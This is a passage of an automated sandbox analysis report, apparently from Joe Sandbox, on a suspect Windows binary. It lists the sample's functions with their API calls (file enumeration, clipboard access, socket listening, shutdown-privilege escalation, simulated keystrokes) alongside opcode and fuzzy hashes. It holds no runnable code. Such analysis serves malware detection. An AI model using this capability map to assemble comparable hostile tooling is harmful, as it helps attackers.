                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                        • String ID: \*.*
                                        • API String ID: 2643075503-1173974218
                                        • Opcode ID: bfa9b3676450479d67648b19a89eb76289fcbca9ce0098e347df6b55a574179b
                                        • Instruction ID: e972a04fef29534890528b71e28c26118fc3997ff77198c076251dd5f0c1a2fb
                                        • Opcode Fuzzy Hash: bfa9b3676450479d67648b19a89eb76289fcbca9ce0098e347df6b55a574179b
                                        • Instruction Fuzzy Hash: 8121C572408344AEC611EBA0D848AEB7BDCAF59214F44491AF6D4C3142EA3CE64DC762
                                        Function 007C7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 759cdea2b3517912e26de3211244b05c307ccdb7996650816b32a160f53359bd
                                        • Instruction ID: 0e4f437aaa36a0cc2a11c9c022dc574819a21a19afdee731e3a9378f2fbea660
                                        • Opcode Fuzzy Hash: 759cdea2b3517912e26de3211244b05c307ccdb7996650816b32a160f53359bd
                                        • Instruction Fuzzy Hash: DE217A31244211AFDB24AF24DC59F6D7BA9BF44761F008019F90ADB2A1DF78AD01DB98
                                        Function 007C24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007C24F6
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007C2526
                                        • _wcscmp.LIBCMT ref: 007C253A
                                        • _wcscmp.LIBCMT ref: 007C2555
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007C25F3
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007C2609
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                        • String ID: *.*
                                        • API String ID: 713712311-438819550
                                        • Opcode ID: 561dbeeccc45a3603a89438c8b19af95a8a93c894fc794abe706f2e9bf0909ba
                                        • Instruction ID: e76d282d62e2c4bf800c7607b4d775e6b2ac17c06be7c25c0be229b5d911be20
                                        • Opcode Fuzzy Hash: 561dbeeccc45a3603a89438c8b19af95a8a93c894fc794abe706f2e9bf0909ba
                                        • Instruction Fuzzy Hash: 61415C7190421AAFCF15DFA4DC59FEEBBB4FF08350F10445AE815A2292E7389A95CF60
                                        Function 00778CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        • Opcode ID: dd45ad1fcc581aef6046e15ba5cb824b8af7b38aea30101f7415d0b6a70a4b60
                                        • Instruction ID: 9092a4f2e80db2725153b2c4638a5ecd757ab82b4409d7ad761403b16233baef
                                        • Opcode Fuzzy Hash: dd45ad1fcc581aef6046e15ba5cb824b8af7b38aea30101f7415d0b6a70a4b60
                                        • Instruction Fuzzy Hash: 1492CD70E0121ECBDF25CF68C9447BDB7B1BB54354F2481AADA19AB380E7789D81CB91
                                        Function 00778530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 5bffcb17011f322b1f9603d72cbbc11303033eb5d3e0b6cc18b98339250827e7
                                        • Instruction ID: fcfef104c926c7aa957ee9364a19bf81e90de58f0b5bd6bd90f11f2a79b25232
                                        • Opcode Fuzzy Hash: 5bffcb17011f322b1f9603d72cbbc11303033eb5d3e0b6cc18b98339250827e7
                                        • Instruction Fuzzy Hash: 4512C370A00609EFDF14DFA5C989AAEB7F5FF48340F208529E40AE7251EB39AD11CB51
                                        Function 007DEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B736: GetCursorPos.USER32(000000FF), ref: 0078B749
                                          • Part of subcall function 0078B736: ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        • ReleaseCapture.USER32 ref: 007DEB1A
                                        • SetWindowTextW.USER32(?,00000000), ref: 007DEBC2
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007DEBD5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 007DECAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 973565025-2107944366
                                        • Opcode ID: 721b838bb0c4ffd170238fbe90f22a9c9b9d3eb0468e860fd8122b0a14fa6fbe
                                        • Instruction ID: 63e4836750ae192cf549bfd27087228d1a59040dfe08ed706541e7a5beff37ab
                                        • Opcode Fuzzy Hash: 721b838bb0c4ffd170238fbe90f22a9c9b9d3eb0468e860fd8122b0a14fa6fbe
                                        • Instruction Fuzzy Hash: AD517A71204304EFDB10EF24CC5AF6A7BF5FB88740F008929F5959A2A2DB789914CB62
                                        Function 007B82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007ABF0F
                                          • Part of subcall function 007ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007ABF3C
                                          • Part of subcall function 007ABEC3: GetLastError.KERNEL32 ref: 007ABF49
                                        • ExitWindowsEx.USER32(?,00000000), ref: 007B830C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-194228
                                        • Opcode ID: af6144d64c6f6dd82e51075a51301e6b48ecc32333e456b7888a2bd17edfa999
                                        • Instruction ID: 8bdf6b2771e6838b1a25582b8d348888ba68f019f2744c7213ee9f6143e8d4bb
                                        • Opcode Fuzzy Hash: af6144d64c6f6dd82e51075a51301e6b48ecc32333e456b7888a2bd17edfa999
                                        • Instruction Fuzzy Hash: 8A018471644211AAE7E826688C5ABFF729CEB01B80F180524F953D71D2DE6C9C00C1A5
                                        Function 007C91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C9235
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9244
                                        • bind.WS2_32(00000000,?,00000010), ref: 007C9260
                                        • listen.WS2_32(00000000,00000005), ref: 007C926F
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9289
                                        • closesocket.WS2_32(00000000), ref: 007C929D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                        • String ID:
                                        • API String ID: 1279440585-0
                                        • Opcode ID: 41263ab96f90ee4fcad97464899ff883381bbea476f206ecd9fe61cefe1b5837
                                        • Instruction ID: 91356ba69e9ad65148c3750370fdb4121012f4e263bbcbd367030b9bbd626fa1
                                        • Opcode Fuzzy Hash: 41263ab96f90ee4fcad97464899ff883381bbea476f206ecd9fe61cefe1b5837
                                        • Instruction Fuzzy Hash: 98217135600600EFCB60EF64C849F6EB7A9BF48724F10815DE956AB291CB78AD41CB61
                                        Function 0077A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • _memmove.LIBCMT ref: 007E3020
                                        • _memmove.LIBCMT ref: 007E3135
                                        • _memmove.LIBCMT ref: 007E31DC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID:
                                        • API String ID: 1300846289-0
                                        • Opcode ID: 396255d7703f188cb8f5c12744b5382ea73bc21b67d5c2654126586a42556b45
                                        • Instruction ID: acec438f768b93eecb252ab6aebf3d5e29c4a472c2beef7b25aeb0a2f0f4d172
                                        • Opcode Fuzzy Hash: 396255d7703f188cb8f5c12744b5382ea73bc21b67d5c2654126586a42556b45
                                        • Instruction Fuzzy Hash: 3302A170A01209EFDF04DF65D985AAE77B5FF88340F14C069E80ADB256EB39DA11CB91
                                        Function 007C96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CACD3: inet_addr.WS2_32(00000000), ref: 007CACF5
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 007C973D
                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 007C9760
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastinet_addrsocket
                                        • String ID:
                                        • API String ID: 4170576061-0
                                        • Opcode ID: ec8932baa5e0dfe330735c10012e1272436ba046928ddb62be07928190babd75
                                        • Instruction ID: a6c1657f12e456ae184760bd0453f5a47b4f8163d482d7cfe311b177e5c72fa4
                                        • Opcode Fuzzy Hash: ec8932baa5e0dfe330735c10012e1272436ba046928ddb62be07928190babd75
                                        • Instruction Fuzzy Hash: 2541A170640200AFDB10BF24CC8AE7E77EDEF44764F54805CF95AAB392DA789E018B91
                                        Function 007BF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 007BF37A
                                        • _wcscmp.LIBCMT ref: 007BF3AA
                                        • _wcscmp.LIBCMT ref: 007BF3BF
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007BF3D0
                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007BF3FE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                        • String ID:
                                        • API String ID: 2387731787-0
                                        • Opcode ID: bbbe6b25cfab4fcc72e3485ca2a9b52e3d49ddcd25282c862d825737e7e3cf06
                                        • Instruction ID: 1dcc79048a8cbfcd5cf1dc208fe1d7ab193f4c91116632234a20df5164db608e
                                        • Opcode Fuzzy Hash: bbbe6b25cfab4fcc72e3485ca2a9b52e3d49ddcd25282c862d825737e7e3cf06
                                        • Instruction Fuzzy Hash: 8B41AF35600301DFCB04DF28C894A9AB3E4FF49324F10456DE95ACB3A1DB39A941CB91
                                        Function 007B4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B439C
                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 007B43B8
                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007B4425
                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007B4483
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 2e5fe0a0d76ca32fac102a75936f0da81cd5d7edd9bc330c3da914d7300374ae
                                        • Instruction ID: 821c5b2ed566c4510edef274f6e559f08272f26a94d451eed070d2515a5857b7
                                        • Opcode Fuzzy Hash: 2e5fe0a0d76ca32fac102a75936f0da81cd5d7edd9bc330c3da914d7300374ae
                                        • Instruction Fuzzy Hash: 014118B0A04288EAEF308B65D8087FD7BB5AF45311F04415AF591A32C2C77C8DA5D775
                                        Function 007DEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • GetCursorPos.USER32(?), ref: 007DEFE2
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007EF3C3,?,?,?,?,?), ref: 007DEFF7
                                        • GetCursorPos.USER32(?), ref: 007DF041
                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,007EF3C3,?,?,?), ref: 007DF077
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                        • String ID:
                                        • API String ID: 1423138444-0
                                        • Opcode ID: 1535d1a3fc0f0d42be44758355a30bdf106a0477129a1e82408d3e1538ad87bd
                                        • Instruction ID: a574f06901d77b4ea91be70d7439dd440939bf7575e63fae2f47e135740935a3
                                        • Opcode Fuzzy Hash: 1535d1a3fc0f0d42be44758355a30bdf106a0477129a1e82408d3e1538ad87bd
                                        • Instruction Fuzzy Hash: 3921A635600118EFCF259F54C898EFA7BB9FB49754F04406AF506873A2C7399D51DB90
                                        Function 007B220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007B221E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: b7f557314a64037773d64cde4d894b77779fab810188c74457ad8a26710df00c
                                        • Instruction ID: 77934086025dcf784136a6beccf725a277fcaa7c6fa259cb66cb91c4756118eb
                                        • Opcode Fuzzy Hash: b7f557314a64037773d64cde4d894b77779fab810188c74457ad8a26710df00c
                                        • Instruction Fuzzy Hash: 00322675A01605DFC728CF69C480AAAB7F0FF48320B15C46EE59ADB7A2D774E942CB44
                                        Function 0078AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0078AE5E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
